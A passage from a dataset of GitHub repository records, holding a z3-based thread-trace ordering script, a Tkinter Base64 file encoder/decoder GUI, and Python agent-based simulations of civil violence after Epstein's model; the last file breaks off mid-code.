inputLine.split(\"-\")\n\n\t\t#populate the hb lists above\t\t\n\t\thbFrom.append(int(str(int(dependencyArray[0]) + 1) + str(dependencyArray[1])))\n\t\thbTo.append(int(str(int(dependencyArray[2]) + 1) + str(dependencyArray[3])))\n\n\t\t#inset event(threadid, instruction count into thread's list)\n\t\tOutputListFormat[int(dependencyArray[0])].append(int(dependencyArray[1]))\t\t\n\t\tOutputListFormat[int(dependencyArray[2])].append(int(dependencyArray[3]))\t\n\nf.close();\n\n#clean up OutputListFormat for empty indexes (for traces with threads less than 10)\ndellist = list()\nz = 0\nfor i in range(len(OutputListFormat)):\n\tif not OutputListFormat[i]:\n\t\tdellist.insert(z,i)\n\tz = z + 1\ndel OutputListFormat[dellist[0]:]\ndel dellist\n#List threads' events created in OutputListFormat\n#and remove duplicate events in each thread's list and sort them\n#trace contains every unique event from every thread\n#in the trace\n\noriginalTrace = list()\nfor a in range(len(OutputListFormat)):\n\tOutputListFormat[a] = list(dict.fromkeys(OutputListFormat[a]))\n\tOutputListFormat[a].sort()\n\tfor b in OutputListFormat[a]:\n\t\toriginalTrace.append(int(str(int(a+1)) + str(b)))\n\ndel OutputListFormat\n#originalTrace contains all unique events in record trace\n\nhbLength = len(hbFrom)\ntraceLength = len(originalTrace)\n\n#declare Integer lists in z3 based from formatted data\nhbFrom1 = [Int('%i' % i) for i in hbFrom]\nhbTo1 = [Int('%i' % j) for j in hbTo]\noriginalTrace1 = [Int('%i' % k) for k in originalTrace]\n\n# Get list of unique postions for every event in trace output\noriginalTracePositions = [Int('%i' % l) for l in range(traceLength)]\n\n#create solver using Inter difference logic and add assert constraints\ns = SolverFor(\"QF_IDL\")\n\n#ensure trace indexes stay within range of tracelength\nfor i in range(traceLength):\n\ts.add(originalTracePositions[i] >= 0, originalTracePositions[i] <= (traceLength-1))\n\n#ensure the positions in final trace are distinct\ns.add(Distinct(originalTracePositions))\n\n#assert intra-thread dependencies for all threads\nfor i in range(traceLength):\n\t#get first index of event pairs and \n\t#check if they match(means from the same thread)\n\tif i + 1 < traceLength and str(originalTrace[i])[0] == str(originalTrace[i+1])[0]:\n\t\ts.add(originalTracePositions[originalTrace1.index(originalTrace1[i])] < originalTracePositions[originalTrace1.index(originalTrace1[i+1])])\n\n#assert inter-thread dependencies\nfor m in range(hbLength):\n\ts.add(originalTracePositions[originalTrace1.index(hbFrom1[m])] < originalTracePositions[originalTrace1.index(hbTo1[m])])\n\nnoOfTraces = 0\nwhile s.check() == sat:\n noOfTraces += 1\n mod = s.model()\n # The positions\n pp = [mod.eval(p).as_long() for p in originalTracePositions]\n\n # Print trace suggestion \n print [originalTrace1[j] for i in range(traceLength) for j in range(traceLength) if pp[j] == i]\n\n # Add this trace as an assertion to solver \n s.add(Or([originalTracePositions[i] != mod.eval(originalTracePositions[i]) for i in range(traceLength)]))\n print\n \nprint \"Number of distinct traces= \", noOfTraces" } ]
2
boonkeato/Base64FileConverter
https://github.com/boonkeato/Base64FileConverter
a13febe92f2113317f16651deeb5e62c368aac0f
9355228d61d5d559e6e7358e6211c9a2efa059fc
079e69293091d0166f906d17bf7f6b5deb9b9bde
refs/heads/master
2020-04-19T02:10:27.268950
2019-01-28T03:47:38
2019-01-28T03:47:38
167,894,388
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6843394637107849, "alphanum_fraction": 0.6955380439758301, "avg_line_length": 31.11236000061035, "blob_id": "a65afe4f78741decff562dc71afdfaaf4e1727e0", "content_id": "3bd5629d08d78778c7a96d8175b41ddc9da47a9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5715, "license_type": "no_license", "max_line_length": 103, "num_lines": 178, "path": "/Base64FileConverterGUI.py", "repo_name": "boonkeato/Base64FileConverter", "src_encoding": "UTF-8", "text": "from tkinter import Tk\nfrom tkinter import Label\nfrom tkinter import Entry\nfrom tkinter import Button\nfrom tkinter import filedialog\nfrom tkinter import StringVar\nfrom tkinter import END\nfrom tkinter import E\nfrom tkinter import W\nfrom tkinter import scrolledtext\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom tkinter import INSERT\nfrom tkinter import Menu\nfrom tkinter import BooleanVar\nimport base64\nimport binascii\nimport imghdr\n\n\ndef select_file():\n filename = filedialog.askopenfilename()\n if filename is \"\": return\n filepath_txt.configure(state=\"normal\")\n filepath_txt.delete(0, END)\n filepath_txt.insert(0, filename)\n filepath_txt.configure(state=\"readonly\")\n convert_btn.configure(state=\"normal\")\n savefile_btn.configure(state=\"disabled\")\n\n\ndef convert():\n filename = filepath_txt.get()\n try:\n with open(filename, \"rb\") as targetFile:\n encodedFile = base64.b64encode(targetFile.read())\n output_panel.configure(state=\"normal\")\n output_panel.delete(1.0, END)\n output_panel.insert(INSERT, encodedFile)\n output_panel.configure(state=\"disabled\")\n except:\n messagebox.showerror(\"Error\", \"No file exists\")\n convert_btn.configure(state=\"disabled\")\n savefile_btn.configure(state=\"normal\")\n\n\ndef save_file():\n f = filedialog.asksaveasfile(mode=\"w\", defaultextension=\".txt\")\n if f is None: return\n try:\n f.write(output_panel.get(1.0, END))\n f.close()\n except:\n messagebox.showerror(\"Error\", \"Error during file write\")\n f.close()\n\n\ndef show_decode():\n if not decode_button.get(): \n decode_button.set(True)\n return\n encode_button.set(False)\n toolbar.pack_forget()\n treeframe.pack_forget()\n decode_toolbar.pack(side=\"top\", fill=\"x\")\n decode_treeframe.pack(side=\"bottom\", fill=\"both\", expand=True)\n\n\ndef show_encode():\n if not encode_button.get(): \n encode_button.set(True)\n return\n decode_button.set(False)\n decode_toolbar.pack_forget()\n decode_treeframe.pack_forget()\n toolbar.pack(side=\"top\", fill=\"x\")\n treeframe.pack(side=\"bottom\", fill=\"both\", expand=True)\n\n\ndef load_file():\n filepath = filedialog.askopenfilename()\n if filepath is \"\": return\n try:\n with open(filepath, \"r\") as targetFile:\n encodedFile = targetFile.read()\n filepreview_panel.configure(state=\"normal\")\n filepreview_panel.delete(1.0, END)\n filepreview_panel.insert(INSERT, encodedFile)\n filepreview_panel.configure(state=\"disabled\") \n decodeto_btn.configure(state=\"normal\")\n except UnicodeDecodeError:\n messagebox.showerror(\"Error\", \"System expects a text file containing base64 string\")\n except:\n messagebox.showerror(\"Error\", \"No file exists\")\n \n \ndef decode_and_save_file():\n fileContent = filepreview_panel.get(1.0, END)\n\n try:\n decoded_fileContent = base64.b64decode(fileContent)\n except binascii.Error:\n messagebox.showerror(\"Error\", \"Not a valid base64 input\")\n\n # TODO: automatically find out what is the extension\n\n f = filedialog.asksaveasfile(mode=\"wb\")\n if f is None: return\n try:\n f.write(decoded_fileContent)\n f.close()\n except:\n messagebox.showerror(\"Error\", \"Error during file write\")\n f.close()\n\n\nwindow = Tk()\nwindow.title(\"Base64 File Converter\")\nwindow.geometry(\"480x300\")\n\n# ---------- Sample Menu code\nmenu = Menu(window)\nencodeDecodeMenu = Menu(menu, tearoff=0)\nencode_button = BooleanVar()\nencode_button.set(True)\ndecode_button = BooleanVar()\nencodeDecodeMenu.add_checkbutton(label=\"Encode Base64\", variable=encode_button, command=show_encode)\nencodeDecodeMenu.add_checkbutton(label=\"Decode Base64\", variable=decode_button, command=show_decode)\nmenu.add_cascade(label=\"File\", menu=encodeDecodeMenu)\nwindow.config(menu=menu)\n\n#----------- Define Tabs\n# tab_control = ttk.Notebook(window)\n# encode_tab = ttk.Frame(tab_control)\n# decode_tab = ttk.Frame(tab_control)\n# tab_control.add(encode_tab, text=\"Encode Base64\")\n# tab_control.add(decode_tab, text=\"Decode Base64\")\n\n# lbl1 = Label(encode_tab, text=\"label1\")\n# lbl1.grid(column=0, row=0)\n# lbl2 = Label(decode_tab, text=\"label2\")\n# lbl2.grid(column=0, row=0)\n\n# tab_control.pack(expand=1, fill=\"both\")\n\n#------------ Encode Frame\ntoolbar = ttk.Frame(window)\ntreeframe = ttk.Frame(window)\n\ntoolbar.pack(side=\"top\", fill=\"x\")\ntreeframe.pack(side=\"bottom\", fill=\"both\", expand=True)\n\ndefault_txt = StringVar(toolbar, value=\"Select the file to convert to base64..\")\nfilepath_txt = Entry(toolbar, width=30, state=\"readonly\", textvariable=default_txt)\n\nselectfile_btn = Button(toolbar, text=\"Select File\", command=select_file)\nconvert_btn = Button(toolbar, text=\"Convert\", state=\"disabled\", command=convert)\nsavefile_btn = Button(toolbar, text=\"Save File\", state=\"disabled\", command=save_file)\nfilepath_txt.pack(side=\"left\")\nselectfile_btn.pack(side=\"left\")\nconvert_btn.pack(side=\"left\")\nsavefile_btn.pack(side=\"left\")\n\noutput_panel = scrolledtext.ScrolledText(treeframe, width=55, height=10, state=\"disabled\")\noutput_panel.pack(side=\"top\", fill=\"both\", expand=True)\n\n#------------ Decode Frame\ndecode_toolbar = ttk.Frame(window)\ndecode_treeframe = ttk.Frame(window)\n\nload_btn = Button(decode_toolbar, text=\"Load File\", command=load_file)\nload_btn.pack(side=\"left\")\ndecodeto_btn = Button(decode_toolbar, text=\"Decode as\", state=\"disabled\", command=decode_and_save_file)\ndecodeto_btn.pack(side=\"left\")\nfilepreview_panel = scrolledtext.ScrolledText(decode_treeframe, width=55, height=10, state=\"disabled\")\nfilepreview_panel.pack(side=\"top\", fill=\"both\", expand=True)\n\nwindow.mainloop()" }, { "alpha_fraction": 0.7647058963775635, "alphanum_fraction": 0.8151260614395142, "avg_line_length": 58.5, "blob_id": "cc4ec29c76756229db0e61eeff7822791087110c", "content_id": "a9b88f13ba58dd5ca892787a1b251f914439fe32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 119, "license_type": "no_license", "max_line_length": 96, "num_lines": 2, "path": "/README.md", "repo_name": "boonkeato/Base64FileConverter", "src_encoding": "UTF-8", "text": "# Base64FileConverter\nSimple GUI to encode file to base64 string, and to perform decoding of base64 string into a file\n" } ]
2
emguzzi/CivilViolenceGESS
https://github.com/emguzzi/CivilViolenceGESS
0412daab5f3a485e1bafcee950278d71324d1f1c
b2c3d9d8df5b70fd13af3109af57192a8b9efa0c
0368015f80f4deae09ba603b60c5fcbb55bae8a7
refs/heads/main
2023-01-20T00:38:59.024110
2020-11-30T08:44:56
2020-11-30T08:44:56
310,348,880
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5438520908355713, "alphanum_fraction": 0.5552579164505005, "avg_line_length": 36.842281341552734, "blob_id": "83e601ce6199a0f00574827afbbc66ae38c51b1a", "content_id": "e7f09f7b15cedb1c662404f9d1872ad4271a4a22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11573, "license_type": "no_license", "max_line_length": 116, "num_lines": 298, "path": "/attempt_reproduce_epstein_model.py", "repo_name": "emguzzi/CivilViolenceGESS", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nimport matplotlib.patches as mpatches\r\nimport plotly.graph_objects as go\r\nfrom datetime import datetime\r\nimport os\r\nimport pandas as pd\r\nimport matplotlib as mpl\r\nfrom tqdm import tqdm, trange\r\n# ============================================\r\n# Global variables for the model --> Do the tuning here\r\n# ============================================\r\nnation_dimension = 40 # Will be a (nation_dimension,nation_dimension) matrix\r\nvision_agent = 5 # Agent's vision\r\nvision_cop = 3 # Cop's vision\r\nL = 0.3 # Legitimacy, must be element of [0,1], see paper\r\nT = 0.03 # Tres-hold of agent's activation\r\nJmax = 9 # Maximal Jail time for type 0\r\nalpha=1.3 # how the jmax term affects the estimated risk to rebel\r\nk = 0.5 # Constant for P : estimated arrest probability\r\npercentage_agent=0.7 #percentage of all the cells occupied by agents\r\npercentage_cops=0.037 #percentage of all the cells occupied by cops\r\ntfin = 150 # Final time, i.e. number of time steps to consider\r\n# ============================================\r\n# Classes and functions (see end of file for simulation)\r\n# ============================================\r\n\r\nclass agent():\r\n def __init__(self, nr):\r\n self.nr = nr # Identifier\r\n self.position = np.random.randint(0, nation_dimension, (2)) # Assigns initial random position on the matrix\r\n # locations_agents_dic[nr] = self.position\r\n self.H = np.random.uniform(0, 1) # Hardship, see paper\r\n self.status = 0 # 0: quite, 1:active, 2:Jail\r\n self.G = self.H * (1 - L) # Grievance, see paper\r\n self.R = np.random.uniform(0, 1) # Risk aversion\r\n self.J = 0 # Remaining jail time, 0 if free\r\n self.P = 0 # Estimated arrest probability\r\n self.N = self.R * self.P * Jmax # Agent's net risk\r\n \r\n\r\n def move(self):\r\n # Moves the agent if the agent is not in jail\r\n shift = np.random.randint(-1, 2, (2))\r\n if self.status == 2: # Check for status\r\n shift = np.array([0, 0])\r\n self.position = self.position + shift # Move\r\n self.position[0] = max(min(self.position[0], nation_dimension - 1), 0) # Do not leave the matrix\r\n self.position[1] = max(min(self.position[1], nation_dimension - 1), 0) # Do not leave the matrix\r\n # locations_agents_dic[self.nr] = self.position\r\n\r\n def update_status(self, arrest=False):\r\n # Updates the agent's status\r\n if self.status == 2 and self.J > 0:\r\n # If in Jail, Jail time reduces by 1\r\n self.J = self.J - 1\r\n\r\n elif self.status == 2 and self.J == 0:\r\n # Exits Jail and is now active\r\n self.status = 1\r\n elif arrest:\r\n # Is arrested and assigned a Jail time, see paper\r\n self.status = 2\r\n self.J = np.random.randint(1, Jmax)\r\n elif self.G - self.N > T:\r\n # Get's active, see paper\r\n self.status = 1\r\n \"\"\"print(\"G:\",self.G)\r\n print(\" N:\",self.N)\r\n print(\" P:\",self.P)\r\n print(\" R:\", self.R)\"\"\"\r\n else:\r\n # Keep quite\r\n self.status = 0\r\n\r\n def active_near_agents(self, agents):\r\n # Computes number of near active agents\r\n near_agents = 0\r\n for agent in agents:\r\n if agent.status == 1:\r\n # Only active agents\r\n pos = agent.position\r\n if np.linalg.norm(self.position - pos, ord=np.inf) < vision_agent:\r\n # If within vision, count\r\n near_agents += 1\r\n if not self.status == 1:\r\n # To avoid double counting but always count the agent self, see paper\r\n near_agents += 1\r\n return near_agents\r\n\r\n def near_cops(self, cops):\r\n # Counts cops within vision\r\n near_cops = 0\r\n for cop in cops:\r\n pos = cop.position\r\n if np.linalg.norm(self.position - pos, ord=np.inf) < vision_agent:\r\n # If within vision count\r\n near_cops += 1\r\n return near_cops\r\n\r\n def updateP(self, agent, cop):\r\n # Updates estimated arrest probability, see paper\r\n active_agents_near = self.active_near_agents(agent)\r\n cops_near = self.near_cops(cop)\r\n self.P = 1 - np.exp(-k * (cops_near+1) / (active_agents_near)) \r\n # +1 for cops near such that it doesn't output 0 when there is no cop in vision\r\n\r\n def updateN(self):\r\n # Update net risk, see paper\r\n self.N = self.R * self.P * (Jmax**alpha)\r\n\r\n\r\n def time_step(self, agent, cops):\r\n # Comptes one time iteration for the given agent\r\n self.move()\r\n self.updateP(agent, cops)\r\n self.updateN()\r\n self.update_status(arrest=False)\r\n return self\r\n\r\n\r\nclass cop():\r\n def __init__(self, nr):\r\n self.nr = nr # Identifier\r\n self.position = np.random.randint(0, nation_dimension, (2)) # Assigns randomly initial position\r\n\r\n def move(self):\r\n # Moves the cop within vision\r\n shift = np.random.randint(-1, 2, (2))\r\n self.position = self.position + shift\r\n self.position[0] = max(min(self.position[0], nation_dimension - 1), 0) # Do not exit matrix\r\n self.position[1] = max(min(self.position[1], nation_dimension - 1), 0) # Do not exit matrix\r\n\r\n def update_agent_status(self, agents):\r\n # Arrests randomly (with bias based on type) an agent within vision\r\n near_active_agents = [] # List agents within vision\r\n for agent in agents:\r\n pos = agent.position\r\n if np.linalg.norm(self.position - pos, ord=np.inf) < vision_cop:\r\n if agent.status == 1:\r\n near_active_agents.append(agent)\r\n\r\n if len(near_active_agents) > 0:\r\n random.choice(near_active_agents).update_status(arrest=True)\r\n # No one activ in vision, no arrest\r\n\r\n def time_step(self, agents):\r\n # Compute one time iteration for cops\r\n self.move()\r\n self.update_agent_status(agents) # Do arrest if possible\r\n return self\r\n\r\n\r\n# ============================================\r\n# Simulation data \r\n# ============================================\r\nn_agents = int(percentage_agent*nation_dimension**2) # Number of considerate agents\r\nn_cops = int(percentage_cops*nation_dimension**2) # Number of considerate cops\r\n\r\nagents = [agent(n) for n in range(n_agents)] # Generate the agents\r\ncops = [cop(n) for n in range(n_cops)] # Generate the cops\r\n\r\nsave = True # Set to True if want to save the data\r\ninteractive = True # If true computes the html slider stuff\r\nshow_plot = False\r\n\r\n# ============================================\r\n# Simulation computation\r\n# ============================================\r\n\r\nnow = datetime.now() # Gets date and time info\r\ndt_string = now.strftime(\"%d_%m_%Y_%H_%M\")\r\nname_to_save = 'simulation_' + dt_string # All will be save with this name + counter + extensions\r\nif save:\r\n if not os.path.isdir(name_to_save):\r\n # If save and directory does not exists, create one\r\n os.mkdir(name_to_save)\r\nname_to_save = name_to_save + '/' + name_to_save\r\n\r\npositions_data = np.empty([tfin, nation_dimension, nation_dimension]) # Stores positional and type data\r\n\r\n\r\ncolor_name_list = [\"white\", \"green\", \"red\", \"black\", \"blue\"]\r\nvalues = [-1, 0, 1, 2, 3]\r\nnames=[\"empty\",\"quiet\",\"rebel\",\"in jail\",\"police\"]\r\n\r\ntime =range(tfin)\r\nD_list = [0]*len(range(tfin))\r\narrested_list = [0]*len(range(tfin))\r\nactive_list = [0]*len(range(tfin))\r\n\r\nfor t in trange(tfin):\r\n arrested = 0\r\n active = 0\r\n # Does the t-th time iteration\r\n positions = np.zeros((nation_dimension, nation_dimension)) - 1 # Initialisation of the matrix\r\n # Values of positions are:\r\n # * -1: no one here\r\n # * 0: quite agent type here\r\n # * 1: active agent type here\r\n # * 2: agent in jail here\r\n # * 3: cop here\r\n for agent in agents:\r\n pos = agent.position\r\n positions[pos[0], pos[1]] = agent.status\r\n if agent.status == 2:\r\n arrested = arrested+1\r\n elif agent.status ==1:\r\n active = active +1\r\n for cop in cops:\r\n pos = cop.position\r\n positions[pos[0], pos[1]] = 3 # Updates matrix data with cops position\r\n positions_data[t, :, :] = positions # Stores the data of the positons\r\n im = plt.imshow(positions, cmap=mpl.colors.ListedColormap(color_name_list))\r\n colors = [im.cmap(im.norm(value)) for value in values]\r\n patches = [mpatches.Patch(color=colors[i], label=names[i]) for i in range(len(values))]\r\n plt.legend(handles=patches, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\r\n if show_plot:\r\n plt.show()\r\n # Plots the positions matrix\r\n if save:\r\n plt.savefig(name_to_save + '_time_iter_nr' + str(t) + '.png')\r\n # Saves the positions matrix\r\n # Compute now one time steps for each cop and each agent\r\n cops = [cop.time_step(agents) for cop in cops]\r\n agents = [ag.time_step(agents, cops) for ag in agents]\r\n arrested_list[t] = arrested\r\n active_list[t] = active\r\n\r\nif interactive:\r\n\r\n # Create figure\r\n fig = go.Figure()\r\n # Add traces, one for each slider step\r\n for step in np.arange(0, tfin, 1):\r\n curent_pd = pd.DataFrame(positions_data[step, :, :])\r\n fig.add_trace(go.Heatmap(\r\n z=curent_pd.applymap(str),\r\n colorscale=color_name_list)\r\n )\r\n # Make First trace visible\r\n fig.data[0].visible = True\r\n # Create and add slider\r\n steps = []\r\n\r\n for i in range(len(fig.data)):\r\n step = dict(\r\n method=\"update\",\r\n args=[{\"visible\": [False] * len(fig.data)},\r\n {\"title\": \"Slider switched to step: \" + str(i)}], # layout attribute\r\n )\r\n step[\"args\"][0][\"visible\"][i] = True # Toggle i'th trace to \"visible\"\r\n steps.append(step)\r\n\r\n sliders = [dict(\r\n active=10,\r\n currentvalue={\"prefix\": \"Time step: \"},\r\n pad={\"t\": 50},\r\n steps=steps\r\n )]\r\n\r\n fig.update_layout(sliders=sliders)\r\n fig.show()\r\n if save:\r\n fig.write_html(name_to_save+'.html')\r\n\r\nif save:\r\n lines = ['nation_dimension' + ': ' + str(nation_dimension),\r\n \r\n 'vision_agent' + ': ' + str(vision_agent),\r\n 'vision_cop' + ': ' + str(vision_cop),\r\n 'L' + ': ' + str(L),\r\n 'T' + ': ' + str(T),\r\n 'Jmax' + ': ' + str(Jmax),\r\n 'k' + ': ' + str(k),\r\n 'n_agents' + ': ' + str(n_agents),\r\n 'percentage_agent' + ': ' + str(percentage_agent),\r\n 'percentage_cops' + ': ' + str(percentage_cops),\r\n 'n_cops' + ': ' + str(n_cops),\r\n 'tfin' + ': ' + str(tfin)]\r\n\r\n with open(name_to_save+'_par.txt','w') as file:\r\n for line in lines:\r\n file.write(line + '\\n')\r\n file.close()\r\n\r\n fig, ax = plt.subplots()\r\n ax.plot(time, arrested_list,label = 'Total number of arrested agents')\r\n ax.set(xlabel='time (epochs)', ylabel=\"number of agents in jail\",title='Arrested agents')\r\n ax.grid()\r\n fig.savefig(name_to_save+'Arrests.png')\r\n\r\n fig, ax = plt.subplots()\r\n ax.plot(time, active_list,label = 'Total number of active agents')\r\n ax.set(xlabel='time (epochs)', ylabel=\"number of active agents\",title='Active agents')\r\n ax.grid()\r\n fig.savefig(name_to_save+'Active.png')" }, { "alpha_fraction": 0.5549695491790771, "alphanum_fraction": 0.568356990814209, "avg_line_length": 35.34848403930664, "blob_id": "6e73da1d5e2a5135a605c3cc0b3da2cfb8ba512a", "content_id": "7e1d06194b9ef2c29ffad26df0e188063ebaf096", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7395, "license_type": "no_license", "max_line_length": 116, "num_lines": 198, "path": "/civil_violence2.py", "repo_name": "emguzzi/CivilViolenceGESS", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport random\r\nfrom tkinter import *\r\nimport time\r\n\r\n# ============================================\r\n# Global variables for the model\r\n# ============================================\r\nnation_dimension = 45 # Will be a (nation_dimension,nation_dimension) matrix\r\nvision_agent = 3 # Agent's vision\r\ninfluence_cop = 3 # Cop's radius of influence\r\nT = 200 # Tres-hold of agent's activation\r\nT_calm = 150 # Treshold needed for the agent to become quiet\r\npercentage_bad_cops=0.1\r\nk = 1 # Constant for P : estimated arrest probability\r\n\r\n# ============================================\r\n# Classes and functions (see end of file for simulation)\r\n# ============================================\r\nclass agent():\r\n def __init__(self, nr):\r\n self.nr = nr # Identifier\r\n self.position = np.random.randint(0, nation_dimension, (2)) # Assigns initial random position on the matrix\r\n # locations_agents_dic[nr] = self.position\r\n self.H = np.random.uniform(0, 1) # Hardship, see paper\r\n self.status = 0 # 0: quite, 1:active\r\n self.Il = np.random.uniform(0, 1) # Percieved Illegitimacy\r\n self.G = self.H * self.Il # Grievance\r\n self.R = np.random.uniform(0, 1) # Risk aversion\r\n self.P = 0 # Estimated arrest probability\r\n\r\n def move(self):\r\n # Moves the agent if the agent is not in jail\r\n shift = np.random.randint(-vision_agent+1, vision_agent, (2))\r\n self.position = self.position + shift # Move\r\n self.position[0] = max(min(self.position[0], nation_dimension - 1), 0) # Do not leave the matrix\r\n self.position[1] = max(min(self.position[1], nation_dimension - 1), 0) # Do not leave the matrix\r\n # locations_agents_dic[self.nr] = self.position\r\n\r\n def active_near_agents(self, agents):\r\n # Computes number of near active agents\r\n near_agents = 0\r\n for agent in agents:\r\n if agent.status == 1:\r\n # Only active agents\r\n pos = agent.position\r\n if np.linalg.norm(self.position - pos, ord=np.inf) < vision_agent:\r\n # If within vision, count\r\n near_agents += 1\r\n if not self.status == 1:\r\n # To avoid double counting but always count the agent self, see paper\r\n near_agents += 1\r\n return near_agents\r\n\r\n def near_cops(self, cops):\r\n # Counts cops within vision\r\n near_cops = 0\r\n for cop in cops:\r\n pos = cop.position\r\n if np.linalg.norm(self.position - pos, ord=np.inf) < vision_agent:\r\n # If within vision count\r\n near_cops += 1\r\n return near_cops\r\n\r\n def updateP(self, agents, cops):\r\n # Updates estimated arrest probability, see paper\r\n active_agents_near = self.active_near_agents(agents)\r\n cops_near = self.near_cops(cops)\r\n self.P = 1 - np.exp(-k * cops_near / active_agents_near)\r\n\r\n def percieved_agressivity_of_cops(self, cops):\r\n # Sums over cops agressivity within influence radius\r\n percieved_agressivity = 0\r\n for cop in cops:\r\n pos = cop.position\r\n if np.linalg.norm(self.position - pos, ord=np.inf) < influence_cop:\r\n # If within vision count\r\n percieved_agressivity += cop.agressivity\r\n return percieved_agressivity\r\n\r\n def updateIl(self, cops):\r\n self.Il=self.Il*np.exp(self.percieved_agressivity_of_cops(cops))\r\n\r\n def updateG(self):\r\n # Update net risk, see paper\r\n self.G = self.Il*self.H\r\n\r\n def update_status(self):\r\n # Updates the agent's status\r\n if self.G - self.R*self.P > T:\r\n # Get's active, see paper\r\n self.status = 1\r\n elif self.G - self.R*self.P < T_calm:\r\n # get quite\r\n self.status = 0\r\n # don't change status\r\n\r\n def time_step(self, agent, cops):\r\n # Comptes one time iteration for the given agent\r\n self.move()\r\n self.updateP(agents, cops)\r\n self.updateIl(cops)\r\n self.updateG()\r\n self.update_status()\r\n return self\r\n\r\n\r\nclass cop():\r\n def __init__(self, nr):\r\n self.nr = nr # Identifier\r\n self.position = np.random.randint(0, nation_dimension, (2)) # Assigns randomly initial position\r\n if random.random()<percentage_bad_cops :\r\n self.agressivity = 1\r\n else:\r\n self.agressivity = -0.1\r\n\r\n def move(self):\r\n # Moves the cop withing vision\r\n shift = np.random.randint(-influence_cop+1, influence_cop, (2))\r\n self.position = self.position + shift\r\n self.position[0] = max(min(self.position[0], nation_dimension - 1), 0) # Do not exit matrix\r\n self.position[1] = max(min(self.position[1], nation_dimension - 1), 0) # Do not exit matrix\r\n\r\n def time_step(self, agents):\r\n # Compute one time iteration for cops\r\n self.move()\r\n return self\r\n\r\n\r\n\r\n# ============================================\r\n# Simulation data --> Do the tuning here\r\n# ============================================\r\nn_agents = 220 # Number of considerate agents\r\nn_cops = 40 # Number of considerate cops\r\n\r\n# ============================================\r\n# Simulation computation\r\n# ============================================\r\nagents = [agent(n) for n in range(n_agents)] # Generate the agents\r\ncops = [cop(n) for n in range(n_cops)] # Generate the cops\r\n\r\npositions = np.zeros((nation_dimension, nation_dimension)) - 1 # Initialisation of the matrix\r\n # Values of positions are:\r\n # * -1: no one here\r\n # * 0: quite agent here\r\n # * 1: active agent here\r\n # * 2: cop here\r\nfor agent in agents:\r\n pos = agent.position\r\n positions[pos[0], pos[1]] = agent.status # Updates matrix data with agents position and status\r\nfor cop in cops:\r\n pos = cop.position\r\n positions[pos[0], pos[1]] = 2 # Updates matrix data with cops position\r\n\r\n\r\nt=300 #time in millisecond between to steps\r\nPix = 8 #size of a square in pixel\r\n\r\ndef show(cops,agents):\r\n interface.delete(ALL)\r\n for cop in cops:\r\n pos = cop.position\r\n interface.create_rectangle(Pix*pos[0],Pix*pos[1],Pix*pos[0]+Pix,Pix*pos[1]+Pix,fill=\"blue\")\r\n for agent in agents:\r\n pos = agent.position\r\n stat= agent.status\r\n color=\"green\"\r\n if stat == 1:\r\n color = \"red\"\r\n interface.create_rectangle(Pix*pos[0],Pix*pos[1],Pix*pos[0]+Pix,Pix*pos[1]+Pix,fill=color)\r\n\r\n\"\"\"\r\ndef show(cops,agents):\r\n interface.delete(ALL)\r\n for cop in cops:\r\n pos = cop.position\r\n a=random.randrange(0,nation_dimension)\r\n b=random.randrange(0,nation_dimension)\r\n interface.create_rectangle(Pix*a,Pix*b,Pix*a+Pix,Pix*b+Pix,fill=\"blue\")\r\n \"\"\"\r\n\r\ndef loop (cops,agents,step):\r\n for m in range(100):\r\n time.sleep(0.001)\r\n cops = [cop.time_step(agents) for cop in cops]\r\n agents = [ag.time_step(agents, cops) for ag in agents]\r\n show(cops,agents) #update the image \r\n print(\"step \"+str(m))\r\n interface.update()\r\n\r\n#Graphic interface with tkinter\r\nwindow = Tk()\r\nwindow.title(\"Civil violence\")\r\ninterface = Canvas(window,height=nation_dimension*Pix,width= nation_dimension*Pix,bg=\"white\")\r\ninterface.pack()\r\nloop(cops,agents,0)\r\nwindow.mainloop()\r\n" }, { "alpha_fraction": 0.5593020915985107, "alphanum_fraction": 0.5771206021308899, "avg_line_length": 39.1067008972168, "blob_id": "9899bdef540b052857fc0ec0de589456be4486c0", "content_id": "468b8527824db83cf68efc2896edc1af0889cf7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16163, "license_type": "no_license", "max_line_length": 118, "num_lines": 403, "path": "/main.py", "repo_name": "emguzzi/CivilViolenceGESS", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport matplotlib.patches as mpatches\nimport plotly.graph_objects as go\nfrom datetime import datetime\nimport os\nimport pandas as pd\nimport matplotlib as mpl\nfrom tqdm import tqdm, trange\n\n# ============================================\n# Global variables for the model\n# ============================================\n\n# General\nnation_dimension = 40 # Will be a (nation_dimension,nation_dimension) matrix\nvision_agent = 7 # Agent's vision\nvision_cop = 7 # Cop's vision\nL = 0.82 # Legitimacy, must be element of [0,1]\nT = 0.1 # Threshold of agent's activation\nJmax = 15 # Maximal Jail time for type 0\nk = 2.3 # Constant for P: estimated arrest probability\n\n# Model bad cops\npercentage_bad_cops = 0.2\n\n# Model two classes\nD_const = [1,2]\nprob_arrest_class_1 = 0.7 # Probability, given an arrest is made, that the arrested agent is of type 1\nfactor_Jmax1 = 2 # How many time is Jmax for type 1 bigger than for type 0\np_class_1 = 0.6 # Probability for an agent to be in class 1\n\n# ============================================\n# Classes and functions (see end of file for simulation)\n# ============================================\n\nclass agent():\n def __init__(self, nr, L, Jmax, p_class_1):\n self.nr = nr # Identifier\n self.vision_agent = vision_agent\n self.position = np.random.randint(0, nation_dimension, (2)) # Assigns initial random position on the matrix\n # locations_agents_dic[nr] = self.position\n self.type = np.random.choice(2, size=1, p=[1 - p_class_1, p_class_1])[0] # Assigns random type 0 or 1\n self.Jmax = Jmax + self.type * Jmax * (factor_Jmax1 - 1) # Maximal Jail time for agent (depends on type)\n self.H = np.random.uniform(0, 1) # Hardship, see paper\n self.status = 0 # 0: quite, 1:active, 2:Jail\n self.G = self.H * (1 - L) # 